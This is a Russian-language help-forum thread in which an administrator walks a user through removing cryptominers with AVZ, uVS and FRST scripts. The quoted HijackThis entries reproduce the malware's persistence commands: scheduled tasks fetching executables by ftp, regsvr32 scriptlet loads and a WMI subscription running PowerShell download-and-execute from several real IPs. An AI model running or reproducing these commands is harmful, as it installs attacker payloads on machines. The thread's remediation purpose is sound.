• Внимание. Восстановление баз 1С7, 1C8 и Mssql после атаки шифровальщика, подробности и отзывы читайте в профильной теме.

Решена Mysa1,2,3,ok. Не устанавливаются антивирусы и прочее.

Статус
В этой теме нельзя размещать новые ответы.

Сергей Г

Новый пользователь
Сообщения
12
Реакции
0
Баллы
1
Тормозит ноут. Проверял Dr.Web CureIt, находит майнеры и др. После лечения ничего не меняется.
Malwarebytes не устанавливается в обычном режиме. В безопасном открылась, также находит кучу разных проблем, чистит, после перезагрузки все по новой.
 
Последнее редактирование модератором:

akok

Команда форума
Администратор
Сообщения
18,326
Реакции
13,792
Баллы
2,203
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ из папки Autologger (Файл - Выполнить скрипт):
Код:
  begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
 QuarantineFile('c:\windows\update.exe','');
 QuarantineFile('c:\windows\debug\item.dat','');
 QuarantineFile('c:\windows\debug\item.dat','');
 QuarantineFile('c:\windows\help\lsmosee.exe','');
 QuarantineFile('c:\windows\debug\ok.dat','');
 QuarantineFile('c:\windows\inf\aspnet\lsma12.exe','');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
 DeleteSchedulerTask('oka');
 DeleteFile('c:\windows\inf\aspnet\lsma12.exe','64');
 DeleteFile('c:\windows\debug\ok.dat','64');
 DeleteFile('c:\windows\help\lsmosee.exe','64');
 DeleteFile('c:\windows\debug\item.dat','64');
 DeleteFile('c:\windows\debug\item.dat','64');
 DeleteFile('c:\windows\update.exe','64');
   BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 BC_ImportALL;
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.
Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O22 - Task: oka - C:\Windows\system32\cmd.exe /c start c:\windows\inf\aspnet\lsma12.exe
O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"
Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".
 

Сергей Г

Новый пользователь
Сообщения
12
Реакции
0
Баллы
1
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ из папки Autologger (Файл - Выполнить скрипт):
Код:
  begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
QuarantineFile('c:\windows\update.exe','');
QuarantineFile('c:\windows\debug\item.dat','');
QuarantineFile('c:\windows\debug\item.dat','');
QuarantineFile('c:\windows\help\lsmosee.exe','');
QuarantineFile('c:\windows\debug\ok.dat','');
QuarantineFile('c:\windows\inf\aspnet\lsma12.exe','');
DeleteSchedulerTask('Mysa');
DeleteSchedulerTask('Mysa1');
DeleteSchedulerTask('Mysa2');
DeleteSchedulerTask('Mysa3');
DeleteSchedulerTask('ok');
DeleteSchedulerTask('oka');
DeleteFile('c:\windows\inf\aspnet\lsma12.exe','64');
DeleteFile('c:\windows\debug\ok.dat','64');
DeleteFile('c:\windows\help\lsmosee.exe','64');
DeleteFile('c:\windows\debug\item.dat','64');
DeleteFile('c:\windows\debug\item.dat','64');
DeleteFile('c:\windows\update.exe','64');
   BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
BC_ImportALL;
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.
Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O22 - Task: oka - C:\Windows\system32\cmd.exe /c start c:\windows\inf\aspnet\lsma12.exe
O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"
Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".
2019.12.27_quarantine_b5e4828011f840a8b570fc7268840be0.7z
 

akok

Команда форума
Администратор
Сообщения
18,326
Реакции
13,792
Баллы
2,203
1. Скачайте утилиту на рабочий стол.
2. Запустите KVRT и подтвердите согласие с условиями использования
3. Дождитесь завершения инициализации и в открывшемся окне нажмите на кнопку "Изменить параметры"
4. В открывшемся меню, поставьте галочку напротив "Системный раздел" и нажмите "Ок"
5. Нажмите кнопку "Начать проверку" для начала сканирования и пролечите все найденое.
6. Дождитесь завершения сканирования и зайдите в папку C:\KVRT_Data\ (C:\ это обычно раздел, где установлена работающая версия Windows) и упакуйте папку Reports в архив и прикрепите к теме

А после свежий лог автологера.
 

Сергей Г

Новый пользователь
Сообщения
12
Реакции
0
Баллы
1
@akok , второй раз kvrt прогоняет и находит 2 угрозы lsma12.exe и vdiymziz.sys. ЧТо с ними сделать? Файл для репорта не создается.
 

akok

Команда форума
Администратор
Сообщения
18,326
Реакции
13,792
Баллы
2,203
Это часть AVZ, система после первого скрипта перезагрузилась?

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ из папки Autologger (Файл - Выполнить скрипт):
Код:
  begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
 TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe');
 QuarantineFile('C:\Windows\inf\aspnet\lsma12.exe','');
 DeleteFile('C:\Windows\inf\aspnet\lsma12.exe','32');
   BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 BC_ImportALL;
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.
Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll
O7 - Taskbar policy: HKU\.DEFAULT\..\Policies\Explorer: [DisallowRun] = 1
Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".
 

Сергей Г

Новый пользователь
Сообщения
12
Реакции
0
Баллы
1
@akok ,да, первый раз нашлось около 40 проблем, перезагрузилась, 2 проблемы, включая часть АВЗ находит.
 

Сергей Г

Новый пользователь
Сообщения
12
Реакции
0
Баллы
1
@akok, нашлась папка. Остальное в процессе. ОГРОМНОЕ спасибо за оказываемую помощь.
 

akok

Команда форума
Администратор
Сообщения
18,326
Реакции
13,792
Баллы
2,203
Код:
C:\FRST\Quarantine\C\Windows\system32\Tasks\Mysa2.xBAD" Info="" />
Где систему лечили?

И свежий лог автологера покажите, нужно проверить не осталось ли чего.
 

Сергей Г

Новый пользователь
Сообщения
12
Реакции
0
Баллы
1
2019.12.27_quarantine_696b7b860f290dac5a5b5a4ed991b240.7z
Код:
C:\FRST\Quarantine\C\Windows\system32\Tasks\Mysa2.xBAD" Info="" />
Где систему лечили?

И свежий лог автологера покажите, нужно проверить не осталось ли чего.
Делал всё по вашим инструкциям.
 

Вложения

Последнее редактирование:

akok

Команда форума
Администратор
Сообщения
18,326
Реакции
13,792
Баллы
2,203
"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O7 - Taskbar policy: HKU\.DEFAULT\..\Policies\Explorer: [DisallowRun] = 1
O22 - Task: oka - C:\Windows\system32\cmd.exe /c start c:\windows\inf\aspnet\lsma12.exe
Скачайте AutorunsVTchecker. Распакуйте и запустите. Не дожидаясь окончания сканирования,
  1. Скачайте Universal Virus Sniffer (uVS)
  2. Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.
    !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.
  4. Дождитесь окончания работы программы и прикрепите лог к посту в теме.
    !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".
Подробнее читайте в руководстве Как подготовить лог UVS.
 

akok

Команда форума
Администратор
Сообщения
18,326
Реакции
13,792
Баллы
2,203
  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    Код:
    ;uVS v4.1.6 [http://dsrt.dyndns.org:8888]
    ;Target OS: NTv6.1
    v400c
    OFFSGNSAVE
    BREG
    ;---------command-block---------
    delref WMI:\\.\ROOT\SUBSCRIPTION\.[FUCKAMM3]
    delref %Sys32%\DRIVERS\21697325.SYS
    zoo %SystemRoot%\INF\ASPNET\LSMA12.EXE
    delall %SystemRoot%\INF\ASPNET\LSMA12.EXE
    apply
    
    czoo
    regt 18
    
    ;---------command-block---------
    delref A9A33436-678B-4C9C-A211-7CC38785E79D\[CLSID]
    delref {23E5D772-327A-42F5-BDEE-C65C6796BB2A}\[CLSID]
    delref {177AFECE-9599-46CF-90D7-68EC9EEB27B4}\[CLSID]
    delref {CEF51277-5358-477B-858C-4E14F0C80BF7}\[CLSID]
    delref {59116E30-02BD-4B84-BA1E-5D77E809B1A2}\[CLSID]
    delref %SystemRoot%\SYSWOW64\TBSSVC.DLL
    delref %SystemRoot%\SYSWOW64\PEERDISTSVC.DLL
    delref %SystemRoot%\SYSWOW64\DRIVERS\NDIS.SYS
    delref %SystemRoot%\SYSWOW64\RDPCORETS.DLL
    delref %SystemRoot%\SYSWOW64\UMPO.DLL
    delref %SystemRoot%\SYSWOW64\IPHLPSVC.DLL
    delref %SystemRoot%\SYSWOW64\CSCSVC.DLL
    delref %SystemRoot%\SYSWOW64\DRIVERS\RDVGKMD.SYS
    delref %SystemRoot%\SYSWOW64\PNRPSVC.DLL
    delref %SystemRoot%\SYSWOW64\DRIVERS\PACER.SYS
    delref %SystemRoot%\SYSWOW64\LSM.EXE
    delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
    delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
    delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
    delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
    delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID]
    delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID]
    delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID]
    delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID]
    delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID]
    delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID]
    delref {8AD9C840-044E-11D1-B3E9-00805F499D93}\[CLSID]
    delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
    delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
    delref %SystemRoot%\SYSWOW64\WIN32K.SYS
    delref {E0DD6CAB-2D10-11D2-8F1A-0000F87ABD16}\[CLSID]
    delref %SystemRoot%\SYSWOW64\BLANK.HTM
    delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID]
    delref {57CE581A-0CB6-4266-9CA0-19364C90A0B3}\[CLSID]
    delref {307A6C42-0000-0010-8000-00AA00389B71}\[CLSID]
    delref {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}\[CLSID]
    delref %Sys32%\BLANK.HTM
    delref FTSHELLCONTEXT EXTENSION\[CLSID]
    delref %Sys32%\DRIVERS\VDIYMZIZ.SYS
    delref %Sys32%\PSXSS.EXE
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.34.7\PSMACHINE_64.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.34.11\PSMACHINE_64.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.34.7\PSMACHINE.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.34.11\PSMACHINE.DLL
    delref F:\HISUITEDOWNLOADER.EXE
    delref F:\SETUP.EXE
    apply
    restart
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
  6. После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z)
    Если архив отсутствует, то заархивруйте папку ZOO с паролем virus.​
  7. Полученный архив отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.
Подробнее читайте в этом руководстве.


Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

akok

Команда форума
Администратор
Сообщения
18,326
Реакции
13,792
Баллы
2,203
В системе ничего активного не вижу. После выполнения скрипта попробуйте установить MBAM.

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    HKLM\...\Policies\Explorer: [DisallowRun] 0
    HKLM\...\Policies\Explorer: [RestrictRun] 0
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
    HKU\S-1-5-19\...\Policies\Explorer: [DisallowRun] 0
    HKU\S-1-5-19\...\Policies\Explorer: [RestrictRun] 0
    HKU\S-1-5-20\...\Policies\Explorer: [DisallowRun] 0
    HKU\S-1-5-20\...\Policies\Explorer: [RestrictRun] 0
    HKU\S-1-5-21-4135779653-1818335319-3566616714-1000\...\Policies\Explorer: [DisallowRun] 0
    HKU\S-1-5-21-4135779653-1818335319-3566616714-1000\...\Policies\Explorer: [RestrictRun] 0
    HKU\S-1-5-18\...\Policies\Explorer: [DisallowRun] 0
    HKU\S-1-5-18\...\Policies\Explorer: [RestrictRun] 0
    Task: {2112DF53-0651-4380-A7BB-2A9D58F45FF6} - \Microsoft\Windows\Media Center\MediaCenterRecoveryTask -> No File <==== ATTENTION
    Task: {ABF025FA-F49D-48D7-AD48-66BC216E85C6} - \Microsoft\Windows\Media Center\PvrScheduleTask -> No File <==== ATTENTION
    Task: {C2D93C13-4F16-40F9-8C07-EA1518D12AFE} - \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask -> No File <==== ATTENTION
    Task: {DA41DE71-8431-42FB-9DB0-EB64A961DEAD} - \Microsoft\Windows\Maintenance\WinSAT -> No File <==== ATTENTION
    Task: {FFB3AB5D-9555-44A8-9D23-021B0B5CEBC0} - \Microsoft\Windows\Media Center\SqlLiteRecoveryTask -> No File <==== ATTENTION
    2019-06-28 12:10 - 2019-06-28 12:10 - 000000000 ___SH () C:\ProgramData\kz.exe
    2019-06-28 12:10 - 2019-06-28 12:10 - 000000000 ___SH () C:\ProgramData\olly.exe
    2019-06-28 12:10 - 2019-06-28 12:10 - 000000000 ___SH () C:\ProgramData\script.exe
    2019-06-28 12:10 - 2019-06-28 12:10 - 000000000 ___SH () C:\Users\Все пользователи\kz.exe
    2019-06-28 12:10 - 2019-06-28 12:10 - 000000000 ___SH () C:\Users\Все пользователи\olly.exe
    2019-06-28 12:10 - 2019-06-28 12:10 - 000000000 ___SH () C:\Users\Все пользователи\script.exe
    FCheck: C:\Windows\boy.exe [2019-06-28] <==== ATTENTION (zero byte File/Folder)
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.
 

Сергей Г

Новый пользователь
Сообщения
12
Реакции
0
Баллы
1
@akok , вот.
@akok , Malwarebytes наконец то установилась и запустилась.
 

Вложения

Последнее редактирование:

akok

Команда форума
Администратор
Сообщения
18,326
Реакции
13,792
Баллы
2,203
Тогда завершаем.
Подготовьте лог SecurityCheck by glax24

Ознакомьтесь: Рекомендации после лечения

Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:
  1. Запустите AVZ.
  2. Закройте все приложения, и запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины)
  3. В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip
  4. Закачайте полученный архив, как описано на этой странице.
  5. Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: RGhost, Zippyshare, My-Files.RU, karelia.ru, Ge.tt или WebFile) и укажите ссылку на скачивание в своём следующем сообщении.
 

Сергей Г

Новый пользователь
Сообщения
12
Реакции
0
Баллы
1
@akok , вот лог. Архив АВЗ загружен.
Всё работате, ничего не тормозит. Спасибо огромное!
 

Вложения

akok

Команда форума
Администратор
Сообщения
18,326
Реакции
13,792
Баллы
2,203
Исправьте по возможности
------------------------------- [ Windows ] -------------------------------
Internet Explorer 11.0.9600.18860 Внимание! Скачать обновления
^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
--------------------------- [ OtherUtilities ] ----------------------------
Microsoft Office Enterprise 2007 v.12.0.4518.1014 Данная программа больше не поддерживается разработчиком. Обновите Microsoft Office до последней версии или используйте Office Online или LibreOffice
--------------------------- [ AdobeProduction ] ---------------------------
Adobe Flash Player 32 PPAPI v.32.0.0.171 Внимание! Скачать обновления


Удачи!
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху Снизу